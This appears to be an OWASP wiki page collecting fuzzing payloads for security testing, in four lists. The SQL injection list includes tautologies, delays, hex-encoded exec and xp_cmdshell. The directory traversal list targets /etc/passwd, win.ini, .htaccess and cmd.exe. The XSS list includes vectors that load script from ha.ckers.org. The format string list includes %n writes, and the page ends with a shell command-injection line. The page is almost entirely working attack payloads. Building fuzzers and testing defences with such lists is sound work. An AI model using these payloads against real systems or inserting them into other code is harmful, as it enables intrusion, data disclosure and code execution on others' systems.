Category:OWASP Fuzzing Code Database

This database is a collection of several statements used in code injection software. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like WebScarab and JBroFuzz with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added.

SQL Injection Statements
'sqlvuln '+sqlvuln sqlvuln; (sqlvuln) a' or 1=1-- a" or 1=1-- " or "a" = "a a' or 'a' = 'a 1 or 1=1 a' waitfor delay '0:0:10'-- 1 waitfor delay '0:0:10'-- declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A 0 031003000270000 declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s) declare @q nvarchar (4000) select @q = 0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q) declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s) a' ? ' or 1=1 ‘ or 1=1 -- x' AND userid IS NULL; -- x' AND email IS NULL; -- anything' OR 'x'='x x' AND 1=(SELECT COUNT(*) FROM tabname); -- x' AND members.email IS NULL; -- x' OR full_name LIKE '%Bob% 23 OR 1=1 '; exec master..xp_cmdshell 'ping 172.10.1.255'--

Directory Traversal Statements
\..\WINDOWS\win.ini \..\..\WINDOWS\win.ini \..\..\..\WINDOWS\win.ini \..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\WINDOWS\win.ini \..\..\..\..\..\..\WINDOWS\win.ini %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 %%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39 ..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ ..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\ %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c %2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c ../../../../../../../../../etc/passwd ../../../../../../../../etc/passwd ../../../../../../../etc/passwd ../../../../../../etc/passwd ../../../../../etc/passwd ../../../../etc/passwd ../../../etc/passwd %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34 ../../../.htaccess ../../.htaccess ../.htaccess .htaccess ././.htaccess %2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%2e%2f%2e%68%74%61%63%63%65%73%73 %2e%68%74%61%63%63%65%73%73 %2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 %%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33 Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".

XSS Statements - Most effective/most common statements
Testing Statements ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//-->">'>alert(String.fromCharCode(88,83,83)) '';!--"=&{}

Common exploit code (covers a lot of XSS vulnerabilities) '>alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83))alert(String.fromCharCode(88,83,83));

XSS Statements - Full List
</SCRIPT> <IMG SRC="javascript:alert('XSS');"> <IMG SRC=javascript:alert('XSS')> <IMG SRC=JaVaScRiPt:alert('XSS')> <IMG SRC=javascript:alert(&quot;XSS&quot;)> <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`> <IMG """>alert("XSS")</SCRIPT>"> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;> <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> <IMG SRC="jav	ascript:alert('XSS');"> <IMG SRC="jav&#x09;ascript:alert('XSS');"> <IMG SRC="jav&#x0A;ascript:alert('XSS');"> <IMG SRC="jav&#x0D;ascript:alert('XSS');"> perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out <IMG SRC=" &#14; javascript:alert('XSS');"> </SCRIPT> <BODY onload!#$%&*~+-_.,:;?@[/|\]^`=alert("XSS")> </SCRIPT> <alert("XSS");//<</SCRIPT>   <IMG SRC="javascript:alert('XSS')" <iframe src=http://ha.ckers.org/scriptlet.html < a=/XSS/\nalert(a.source)</SCRIPT> \";alert('XSS');// </TITLE>alert("XSS");</SCRIPT> <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> <BODY BACKGROUND="javascript:alert('XSS')"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC="javascript:alert('XSS')"> <IMG LOWSRC="javascript:alert('XSS')"> <BGSOUND SRC="javascript:alert('XSS');"> <BR SIZE="&{alert('XSS')}"> <LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> <LINK REL="stylesheet" HREF="javascript:alert('XSS');"> <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <XSS STYLE="behavior: url(xss.htc);"> <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS <IMG SRC='vbscript:msgbox("XSS")'> ¼script¾alert(¢XSS¢)¼/script¾ <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> <TABLE BACKGROUND="javascript:alert('XSS')"> <TABLE><TD BACKGROUND="javascript:alert('XSS')"> <DIV STYLE="background-image: url(javascript:alert('XSS'))"> <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029"> <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))"> <DIV STYLE="width: expression(alert('XSS'));"> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> <XSS STYLE="xss:expression(alert('XSS'))"> exp/*<A STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> <STYLE TYPE="text/javascript">alert('XSS');</STYLE> <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<BASE HREF="javascript:alert('XSS');//"> <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> <OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED> <EMBED SRC="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==" type="image/svg+xml" AllowScriptAccess="always"></EMBED> <HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML> <XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X> <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <XML ID="xss"><I><B>&lt;IMG SRC="javascript:alert('XSS')"&gt;</B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN> <XML SRC="xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN> <HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS&lt;SCRIPT DEFER&gt;alert(&quot;XSS&quot;)&lt;/SCRIPT&gt;"></BODY></HTML> </SCRIPT>

<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> <META HTTP-EQUIV="Set-Cookie" Content="USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;"> <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4- " SRC="http://ha.ckers.org/xss.js"></SCRIPT> " SRC="http://ha.ckers.org/xss.js"></SCRIPT> " '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> '" SRC="http://ha.ckers.org/xss.js"></SCRIPT> ` SRC="http://ha.ckers.org/xss.js"></SCRIPT> '>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <A HREF="http://66.102.7.147/">XSS</A> <A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A> <A HREF="http://1113982867/">XSS</A> <A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> <A HREF="http://0102.0146.0007.00000223/">XSS</A> <A HREF="h\ntt\tp://6&#9;6.000146.0x7.147/">XSS</A> <A HREF="//www.google.com/">XSS</A> <A HREF="//google">XSS</A> <A HREF="http://google.com/">XSS</A> <A HREF="http://www.google.com./">XSS</A> <A HREF="javascript:document.location='http://www.google.com/'">XSS</A> <A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A> <a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"> <a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"> <div onmouseover="document.write("XSS-XSS-XSS");"> <img src="javascript:document.write("XSS-XSS-XSS");"> <img dynsrc="javascript:document.write("XSS-XSS-XSS");"> <input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"> <bgsound src="javascript:document.write("XSS-XSS-XSS");"> & document.write("XSS-XSS-XSS"); &{document.write("XSS-XSS-XSS");}; <img src=&{document.write("XSS-XSS-XSS");};> <link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"> <iframe src="vbscript:document.write("XSS-XSS-XSS");"> <img src="mocha:document.write("XSS-XSS-XSS");"> <img src="livescript:document.write("XSS-XSS-XSS");"> <a href="about:<s&#99;ript>document.write("XSS-XSS-XSS"); "> <meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"> <body onload="document.write("XSS-XSS-XSS");"> <div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> <div style="width: expression(document.write("XSS-XSS-XSS"););"> <style type="text/javascript">document.write("XSS-XSS-XSS"); <object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"> <![CDATA[ document.write("XSS-XSS-XSS"); < document.write("XSS-XSS-XSS"); <img src="blah"onmouseover="document.write("XSS-XSS-XSS");"> " onmouseover="document.write("XSS-XSS-XSS");"> <xml src="javascript:document.write("XSS-XSS-XSS");"> <xml id="X"><a>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</a> <a href="javas&#99;ript&#35;document.write("XSS-XSS-XSS");"> <div onmouseover="document.write("XSS-XSS-XSS");"> <img src="javascript:document.write("XSS-XSS-XSS");"> <img dynsrc="javascript:document.write("XSS-XSS-XSS");"> <input type="image" dynsrc="javascript:document.write("XSS-XSS-XSS");"> <bgsound src="javascript:document.write("XSS-XSS-XSS");"> & document.write("XSS-XSS-XSS"); &{document.write("XSS-XSS-XSS");}; <img src=&{document.write("XSS-XSS-XSS");};> <link rel="stylesheet" href="javascript:document.write("XSS-XSS-XSS");"> <iframe src="vbscript:document.write("XSS-XSS-XSS");"> <img src="mocha:document.write("XSS-XSS-XSS");"> <img src="livescript:document.write("XSS-XSS-XSS");"> <a href="about:<s&#99;ript>document.write("XSS-XSS-XSS"); "> <meta http-equiv="refresh" content="0;url=javascript:document.write("XSS-XSS-XSS");"> <body onload="document.write("XSS-XSS-XSS");"> <div style="background-image: url(javascript:document.write("XSS-XSS-XSS"););"> <div style="behaviour: url([link to code]);"> <div style="binding: url([link to code]);"> [Mozilla] <div style="width: expression(document.write("XSS-XSS-XSS"););"> <style type="text/javascript">document.write("XSS-XSS-XSS"); <object classid="clsid:..." codebase="javascript:document.write("XSS-XSS-XSS");"> <![CDATA[ document.write("XSS-XSS-XSS"); < document.write("XSS-XSS-XSS"); <img src="blah"onmouseover="document.write("XSS-XSS-XSS");"> " onmouseover="document.write("XSS-XSS-XSS");"> <xml src="javascript:document.write("XSS-XSS-XSS");"> <xml id="X"><a>&lt;script>document.write("XSS-XSS-XSS");&lt;/script>;</a> [\xC0][\xBC]script>document.write("XSS-XSS-XSS");[\xC0][\xBC]/script>

Format String Statements
%s%p%x%d .1024d %.2049d %p%p%p%p %x%x%x%x %d%d%d%d %s%s%s%s %99999999999s %08x %%20d %%20n %%20x %%20s %s%s%s%s%s%s%s%s%s%s %p%p%p%p%p%p%p%p%p%p %#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% f(x)=%s x 123 f(x)=%x x 255 %x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x %s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s XXXXX.%p XXXXX`perl -e 'print ".%p" x 80'` `perl -e 'print ".%p" x 80'`%n %08x.%08x.%08x.%08x.%08x\n XXX0_%08x.%08x.%08x.%08x.%08x\n %.16705u%2\$hn \x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|
 * id > /tmp/file; exit;